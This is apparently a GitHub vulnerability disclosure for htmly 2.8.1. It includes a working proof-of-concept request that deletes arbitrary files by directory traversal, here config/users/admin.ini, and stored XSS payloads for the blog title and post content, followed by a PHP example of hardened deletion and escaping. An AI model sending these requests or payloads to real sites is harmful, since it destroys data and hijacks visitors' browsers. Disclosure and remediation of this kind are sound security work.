
Arbitrary file deletion and Persistent XSS exists on htmly 2.8.1 #481

Closed
@fuzz7j

Description


1. An Arbitrary file deletion vulnerability in the backend

In htmly-2.8.1\system\admin\views\backup.html.php, line 7:

if (!empty($file)) {
    unlink("backup/$file");
}

When we delete our backup files, we can delete any files on the system through directory traversal.
(screenshot: delFile1)

Example:
When we log in, we can go to Setting -> Backup -> Create backup, then click Delete, and we get a link. Then we modify the file field to /config/users/admin.ini and submit.

GET /admin/backup?file=../config/users/admin.ini&submit=Delete HTTP/1.1
Host: 10.211.55.3:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.211.55.3:8888/admin/backup
Cookie: CSRF_TOKEN=ncDpMG6sz9cWAhPp; kodUserID=1; __51uvsct__JH8lWQvr8bXXIzV9=2; __51vcke__JH8lWQvr8bXXIzV9=c4695bd5-02b6-5295-974b-e8ddcfdf0022; __51vuft__JH8lWQvr8bXXIzV9=1625743826644; HOST=http%3A//10.211.55.3%3A88/; APP_HOST=http%3A//10.211.55.3%3A88/; kodUserLanguage=zh-CN; kodVersionCheck=check-at-1625809444; X-CSRF-TOKEN=m655d6hVx8EiMrw2nNue; PHPSESSID=4pau0op8l24alsd5sps034a4l2
Upgrade-Insecure-Requests: 1

The administrator information has been deleted and no one can log in to the system.

2. Persistent XSS on Blog title

Since the Blog title is not processed by htmlentities,
(screenshot: blogtitleXss3)
when we modify the Blog title to <script>alert(/test/)</script>, JavaScript is executed.
(screenshot: blogtitleXss1)
(screenshot: blogtitleXss2)

3. Persistent XSS on Creating regular blog post.

When we create a regular blog post, enter
</div><script>alert(/xxx/)</script> in Content and visit this article, JavaScript is executed.
(screenshot: contentXss1)
(screenshot: contentXss2)
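The following is an added example of how the unlink("backup/$file") call quoted in the report could be hardened, written for this issue and not taken from htmly's code; the function names, the backup directory and the `.zip` filename pattern are assumptions.

```php
<?php
// Added example, not htmly's code. Replaces the unquoted unlink("backup/$file")
// with a check that the requested name is a plain filename that resolves
// inside the backup directory, so "../config/users/admin.ini" is refused.

/**
 * Delete one backup file, refusing any name that is not a plain filename
 * living directly inside $backupDir. Returns true only on a real deletion.
 */
function deleteBackupFile(string $backupDir, string $file): bool
{
    // 1. Reject anything that is not a bare filename: empty names, NUL bytes,
    //    path separators, and the "." / ".." components used for traversal.
    if ($file === '' || $file === '.' || $file === '..'
        || $file !== basename($file)
        || strpbrk($file, "\0/\\") !== false) {
        return false;
    }
    // Allow-list the expected backup name shape (assumed pattern, adjust to taste).
    if (!preg_match('/^[A-Za-z0-9._-]+\.zip$/', $file)) {
        return false;
    }
    // 2. Resolve both paths and confirm the target is still under $backupDir.
    //    realpath() also follows symlinks, so a planted link cannot escape.
    $base   = realpath($backupDir);
    $target = realpath($backupDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $target === false) {
        return false; // directory missing or file does not exist
    }
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($target)) {
        return false; // resolved outside the backup directory, or not a regular file
    }
    return unlink($target);
}

// Output-side fix for the Blog title finding: escape before echoing into HTML.
// (Post content is markdown in htmly, so it needs an HTML sanitizer rather
// than blanket escaping; that part is out of scope for this example.)
function escapeTitle(string $title): string
{
    return htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed usage:
var_dump(deleteBackupFile(__DIR__ . '/backup', '../config/users/admin.ini')); // bool(false)
echo escapeTitle('<script>alert(/test/)</script>'), PHP_EOL; // rendered inert
```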
